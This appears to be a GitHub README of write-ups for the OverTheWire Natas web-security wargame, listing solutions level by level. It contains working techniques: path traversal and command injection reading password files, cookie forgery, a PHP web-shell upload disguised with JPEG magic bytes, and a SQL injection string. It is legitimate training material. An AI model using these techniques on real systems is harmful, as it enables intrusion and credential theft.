Skip to content

vaezim/OverTheWire-Writeups

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
natas
natas
 
 
README.md
README.md
 
 

Repository files navigation

Natas writeup

Levels

  1. page source [Ctrl + U]
  2. page source [Ctrl + U]
  3. url + /files
  4. url + /robots.txt & url + /s3cr3t/
  5. Edit the Referer value

  1. Set Cookie: Loggedin=1

  1. url + includes/secret.inc & page source
  2. url + index.php?page=/etc/natas_webpass/natas8
  3. Decode the encoded secret:

    OverTheWire-Writeups/natas/code/natas8.php

    Lines 1 to 10 in c6f9570

    <?php
    $encodedSecret = "3d3d516343746d4d6d6c315669563362";
    function decodeSecret($encodedSecret) {
    return base64_decode(strrev(hex2bin($encodedSecret)));
    }
    echo decodeSecret($encodedSecret);
    echo "\n";
    ?>
  4. Find words containing: a /etc/natas_webpass/natas10;
  5. Find words containing: a /etc/natas_webpass/natas11
  6. First find the XOR key used by the server side using default cookie data:

then set $default_data["showpassword"] = "yes":

OverTheWire-Writeups/natas/code/natas11.php

Lines 1 to 22 in 504cad6

<?php
function xor_encrypt($text, $key) {
$outText = '';
for ($i=0; $i<strlen($text); $i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
$default_data = array("showpassword"=>"no", "bgcolor"=>"#ffffff");
$cookie_data = "MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgpbjY=";
// Find the key used in XOR on the server side
$xor_key = xor_encrypt(json_encode($default_data), base64_decode($cookie_data));
$xor_key = substr($xor_key, 0, 4); // KNHL
// Set array["showpassword"] => "yes" and generate cookie data
$default_data["showpassword"] = "yes";
$new_cookie_data = base64_encode(xor_encrypt(json_encode($default_data), $xor_key));
echo $new_cookie_data;
echo "\n";
?>

  1. Upload a php file to print the output of the command cat /etc/natas_webpass/natas13.

    OverTheWire-Writeups/natas/code/natas12.php

    Lines 1 to 6 in 42949a4

    <?php
    exec("cat /etc/natas_webpass/natas13", $output);
    print_r($output[0]);
    ?>
    Then change the filename request parameter to a string with .php extension:

  1. We need to put jpeg's magic number ff d8 ff e0 to the beginning of the file.

    OverTheWire-Writeups/natas/code/natas13.py

    Lines 1 to 15 in 43b8535

    jpeg_magic_number = b"\xff\xd8\xff\xe0"
    with open("./natas13.php", "wb") as f:
    f.write(jpeg_magic_number)
    php_code = \
    """
    <?php
    exec("cat /etc/natas_webpass/natas14", $output);
    print_r($output[0]);
    ?>
    """
    with open("./natas13.php", "a") as f:
    f.write(php_code)
    The rest is the same as level 12.

  2. Add debug key to the query parameters:

SQL Injection: username = " or true; -- & password = <Anything>

About

Writeups for OverTheWire wargames

overthewire.org/wargames/

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Languages